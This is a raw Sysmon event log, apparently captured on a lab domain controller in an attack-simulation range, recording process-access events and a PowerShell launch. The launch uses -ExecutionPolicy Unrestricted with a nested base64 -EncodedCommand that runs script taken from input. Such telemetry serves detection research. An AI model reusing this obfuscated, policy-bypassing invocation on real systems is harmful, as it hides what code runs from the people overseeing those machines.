15:52:56.415{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004812Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:56.415{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004811Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:56.415{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004810Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:56.415{D28789B6-7C62-5FA1-0500-000000008801}6442444C:\Windows\system32\csrss.exe{D28789B6-7CD8-5FA1-F500-000000008801}4956C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000004809Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:56.415{D28789B6-7CD8-5FA1-F200-000000008801}46885060C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{D28789B6-7CD8-5FA1-F500-000000008801}4956C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+3332f6|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+2b5560|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+2b4f07|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+319332ed(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+30dd4177(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+30dd3e48(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+318854ad(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+30d949de(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+30df2ead(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+30dd6512(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+30dd6512(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+30dd63a3(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+30dc8328(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+30dd485b(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+30dd444e(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+30dd4177(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+30dd3e48(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+318854ad(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+30dbaca9(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+30dba279(wow64) 154100x80000000000000004808Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:56.418{D28789B6-7CD8-5FA1-F500-000000008801}4956C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe10.0.14393.206 (rs1_release.160915-0644)Windows PowerShellMicrosoft® Windows® Operating SystemMicrosoft CorporationPowerShell.EXE"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -NonInteractive -ExecutionPolicy Unrestricted -EncodedCommand JgBjAGgAYwBwAC4AYwBvAG0AIAA2ADUAMAAwADEAIAA+ACAAJABuAHUAbABsAAoAJABlAHgAZQBjAF8AdwByAGEAcABwAGUAcgBfAHMAdAByACAAPQAgACQAaQBuAHAAdQB0ACAAfAAgAE8AdQB0AC0AUwB0AHIAaQBuAGcACgAkAHMAcABsAGkAdABfAHAAYQByAHQAcwAgAD0AIAAkAGUAeABlAGMAXwB3AHIAYQBwAHAAZQByAF8AcwB0AHIALgBTAHAAbABpAHQAKABAACgAIgBgADAAYAAwAGAAMABgADAAIgApACwAIAAyACwAIABbAFMAdAByAGkAbgBnAFMAcABsAGkAdABPAHAAdABpAG8AbgBzAF0AOgA6AFIAZQBtAG8AdgBlAEUAbQBwAHQAeQBFAG4AdAByAGkAZQBzACkACgBJAGYAIAAoAC0AbgBvAHQAIAAkAHMAcABsAGkAdABfAHAAYQByAHQAcwAuAEwAZQBuAGcAdABoACAALQBlAHEAIAAyACkAIAB7ACAAdABoAHIAbwB3ACAAIgBpAG4AdgBhAGwAaQBkACAAcABhAHkAbABvAGEAZAAiACAAfQAKAFMAZQB0AC0AVgBhAHIAaQBhAGIAbABlACAALQBOAGEAbQBlACAAagBzAG8AbgBfAHIAYQB3ACAALQBWAGEAbAB1AGUAIAAkAHMAcABsAGkAdABfAHAAYQByAHQAcwBbADEAXQAKACQAZQB4AGUAYwBfAHcAcgBhAHAAcABlAHIAIAA9ACAAWwBTAGMAcgBpAHAAdABCAGwAbwBjAGsAXQA6ADoAQwByAGUAYQB0AGUAKAAkAHMAcABsAGkAdABfAHAAYQByAHQAcwBbADAAXQApAAoAJgAkAGUAeABlAGMAXwB3AHIAYQBwAHAAZQByAA==C:\Users\Administrator\ATTACKRANGE\Administrator{D28789B6-7CD8-5FA1-59E7-0A0000000000}0xae7590HighMD5=097CE5761C89434367598B34FE32893B,SHA256=BA4038FD20E474C047BE8AAD5BFACDB1BFC1DDBE12F803F473B7918D8D819436,IMPHASH=CAEE994F79D85E47C06E5FA9CDEAE453{D28789B6-7CD8-5FA1-F200-000000008801}4688C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exePowerShell -NoProfile -NonInteractive -ExecutionPolicy Unrestricted -EncodedCommand UABvAHcAZQByAFMAaABlAGwAbAAgAC0ATgBvAFAAcgBvAGYAaQBsAGUAIAAtAE4AbwBuAEkAbgB0AGUAcgBhAGMAdABpAHYAZQAgAC0ARQB4AGUAYwB1AHQAaQBvAG4AUABvAGwAaQBjAHkAIABVAG4AcgBlAHMAdAByAGkAYwB0AGUAZAAgAC0ARQBuAGMAbwBkAGUAZABDAG8AbQBtAGEAbgBkACAASgBnAEIAagBBAEcAZwBBAFkAdwBCAHcAQQBDADQAQQBZAHcAQgB2AEEARwAwAEEASQBBAEEAMgBBAEQAVQBBAE0AQQBBAHcAQQBEAEUAQQBJAEEAQQArAEEAQwBBAEEASgBBAEIAdQBBAEgAVQBBAGIAQQBCAHMAQQBBAG8AQQBKAEEAQgBsAEEASABnAEEAWgBRAEIAagBBAEYAOABBAGQAdwBCAHkAQQBHAEUAQQBjAEEAQgB3AEEARwBVAEEAYwBnAEIAZgBBAEgATQBBAGQAQQBCAHkAQQBDAEEAQQBQAFEAQQBnAEEAQwBRAEEAYQBRAEIAdQBBAEgAQQBBAGQAUQBCADAAQQBDAEEAQQBmAEEAQQBnAEEARQA4AEEAZABRAEIAMABBAEMAMABBAFUAdwBCADAAQQBIAEkAQQBhAFEAQgB1AEEARwBjAEEAQwBnAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBBAGcAQQBEADAAQQBJAEEAQQBrAEEARwBVAEEAZQBBAEIAbABBAEcATQBBAFgAdwBCADMAQQBIAEkAQQBZAFEAQgB3AEEASABBAEEAWgBRAEIAeQBBAEYAOABBAGMAdwBCADAAQQBIAEkAQQBMAGcAQgBUAEEASABBAEEAYgBBAEIAcABBAEgAUQBBAEsAQQBCAEEAQQBDAGcAQQBJAGcAQgBnAEEARABBAEEAWQBBAEEAdwBBAEcAQQBBAE0AQQBCAGcAQQBEAEEAQQBJAGcAQQBwAEEAQwB3AEEASQBBAEEAeQBBAEMAdwBBAEkAQQBCAGIAQQBGAE0AQQBkAEEAQgB5AEEARwBrAEEAYgBnAEIAbgBBAEYATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBQAEEASABBAEEAZABBAEIAcABBAEcAOABBAGIAZwBCAHoAQQBGADAAQQBPAGcAQQA2AEEARgBJAEEAWgBRAEIAdABBAEcAOABBAGQAZwBCAGwAQQBFAFUAQQBiAFEAQgB3AEEASABRAEEAZQBRAEIARgBBAEcANABBAGQAQQBCAHkAQQBHAGsAQQBaAFEAQgB6AEEAQwBrAEEAQwBnAEIASgBBAEcAWQBBAEkAQQBBAG8AQQBDADAAQQBiAGcAQgB2AEEASABRAEEASQBBAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBBAHUAQQBFAHcAQQBaAFEAQgB1AEEARwBjAEEAZABBAEIAbwBBAEMAQQBBAEwAUQBCAGwAQQBIAEUAQQBJAEEAQQB5AEEAQwBrAEEASQBBAEIANwBBAEMAQQBBAGQAQQBCAG8AQQBIAEkAQQBiAHcAQgAzAEEAQwBBAEEASQBnAEIAcABBAEcANABBAGQAZwBCAGgAQQBHAHcAQQBhAFEAQgBrAEEAQwBBAEEAYwBBAEIAaABBAEgAawBBAGIAQQBCAHYAQQBHAEUAQQBaAEEAQQBpAEEAQwBBAEEAZgBRAEEASwBBAEYATQBBAFoAUQBCADAAQQBDADAAQQBWAGcAQgBoAEEASABJAEEAYQBRAEIAaABBAEcASQBBAGIAQQBCAGwAQQBDAEEAQQBMAFEAQgBPAEEARwBFAEEAYgBRAEIAbABBAEMAQQBBAGEAZwBCAHoAQQBHADgAQQBiAGcAQgBmAEEASABJAEEAWQBRAEIAMwBBAEMAQQBBAEwAUQBCAFcAQQBHAEUAQQBiAEEAQgAxAEEARwBVAEEASQBBAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBCAGIAQQBEAEUAQQBYAFEAQQBLAEEAQwBRAEEAWgBRAEIANABBAEcAVQBBAFkAdwBCAGYAQQBIAGMAQQBjAGcAQgBoAEEASABBAEEAYwBBAEIAbABBAEgASQBBAEkAQQBBADkAQQBDAEEAQQBXAHcAQgBUAEEARwBNAEEAYwBnAEIAcABBAEgAQQBBAGQAQQBCAEMAQQBHAHcAQQBiAHcAQgBqAEEARwBzAEEAWABRAEEANgBBAEQAbwBBAFEAdwBCAHkAQQBHAFUAQQBZAFEAQgAwAEEARwBVAEEASwBBAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBCAGIAQQBEAEEAQQBYAFEAQQBwAEEAQQBvAEEASgBnAEEAawBBAEcAVQBBAGUAQQBCAGwAQQBHAE0AQQBYAHcAQgAzAEEASABJAEEAWQBRAEIAdwBBAEgAQQBBAFoAUQBCAHkAQQBBAD0APQA= 10341000x80000000000000004807Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:56.352{D28789B6-7C62-5FA1-0B00-000000008801}8684712C:\Windows\system32\lsass.exe{D28789B6-7CD8-5FA1-F200-000000008801}4688C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+25d17|C:\Windows\system32\lsasrv.dll+26ded|C:\Windows\system32\lsasrv.dll+25b95|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004806Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:56.352{D28789B6-7C62-5FA1-0B00-000000008801}8684712C:\Windows\system32\lsass.exe{D28789B6-7CD8-5FA1-F200-000000008801}4688C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+64ebf|C:\Windows\system32\lsasrv.dll+25add|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 11241100x80000000000000004805Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:56.321{D28789B6-7CD8-5FA1-F200-000000008801}4688C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\__PSScriptPolicyTest_paa3gb3u.ncy.ps12020-11-03 15:52:56.321 10341000x80000000000000004804Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:56.305{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7CD8-5FA1-F200-000000008801}4688C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+2e43b|C:\Windows\System32\RPCRT4.dll+6213a|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004803Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:56.289{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004802Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:56.289{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004801Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:56.289{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004800Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:56.289{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004799Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:56.289{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004798Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:56.289{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004797Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:56.289{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004796Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:56.289{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004795Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 